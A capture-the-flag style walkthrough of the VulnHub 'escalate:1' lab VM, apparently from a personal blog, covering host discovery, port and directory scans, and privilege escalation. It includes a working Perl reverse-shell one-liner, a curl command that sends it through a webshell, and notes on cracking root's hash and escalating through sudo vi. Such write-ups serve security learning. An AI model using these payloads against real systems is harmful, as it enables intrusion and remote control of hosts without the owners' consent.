vulnhub-wp escalate:1

🖳 host discover

1
2
3
4
5
6
7
8
9
10
sudo netdiscover -r 192.168.165.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                          
                                                                                                                                                                        
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                        
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.165.14  c6:3b:70:2b:33:1e      1      60  Unknown vendor                                                                                                       
 192.168.165.60  08:00:27:ea:fe:25      1      60  PCS Systemtechnik GmbH                                                                                               
 192.168.165.196 20:1e:88:ad:fc:55      1      60  Intel Corporate

target was 192.168.165.60

👁 service scan

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
sudo nmap -p- -sV -sC -Pn -oN nmap --min-rate 8000 192.168.165.60
···
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      39060/udp   mountd
|   100005  1,2,3      39568/udp6  mountd
|   100005  1,2,3      52275/tcp   mountd
|   100005  1,2,3      53503/tcp6  mountd
|   100021  1,3,4      33553/tcp6  nlockmgr
|   100021  1,3,4      39193/tcp   nlockmgr
|   100021  1,3,4      53493/udp   nlockmgr
|   100021  1,3,4      56884/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs         3-4 (RPC #100003)
35337/tcp open  mountd      1-3 (RPC #100005)
39193/tcp open  nlockmgr    1-4 (RPC #100021)
52275/tcp open  mountd      1-3 (RPC #100005)
56035/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:EA:FE:25 (Oracle VirtualBox virtual NIC)
Service Info: Host: LINUX
···

🚪🚶 get shell

path brute

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
gobuster dir -u http://192.168.165.60 -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.165.60
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/shell.php            (Status: 200) [Size: 29]
Progress: 5163 / 5164 (99.98%)
===============================================================
Finished
===============================================================

find a webshell page,bound shell!
payload

1
perl -e 'use Socket;$i="192.168.165.130";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'

url encode->final payload(https://www.urlencoder.org/)

1
curl http://192.168.165.60/shell.php?cmd=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.165.130%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22bash%20-i%22%29%3B%7D%3B%27

🛡️ PE

No.1 user3/shell PE

enum manucal,we find there was a shell binary in /home/user3

No.2 user5 PE

in /home/user5, there was a script binary file,after we excute command follow user5’s .bash_history,we could get all the users hash
and we could crack root’s passwd root:12345

No.3 user8 PE


from user8’s history, we find the mysql config file,and find the pass of mysql

and we seletc the password of user:mysql

and we find the cred of all user

user2

user2 could use user1’s command,but we dont have user1’s passwd,but we could deduce user1 have the same format passwd user1@12345, and it was after trying.

user8

user8 have sudo for vi, so get the root shell by vi(GTFOBins)

📖 recommend article

cause my ability was limited and i was tired in the night,so i just find this way to PE. author say there was 12+ way of PE

escalate:1 download
another walkthrough

vulnhub
#vulnhub
vulnhub-wp escalate:1
https://rightevil.github.io/vulnhub-wp-escalate-1/
作者
rightevil
发布于
2024年3月16日
许可协议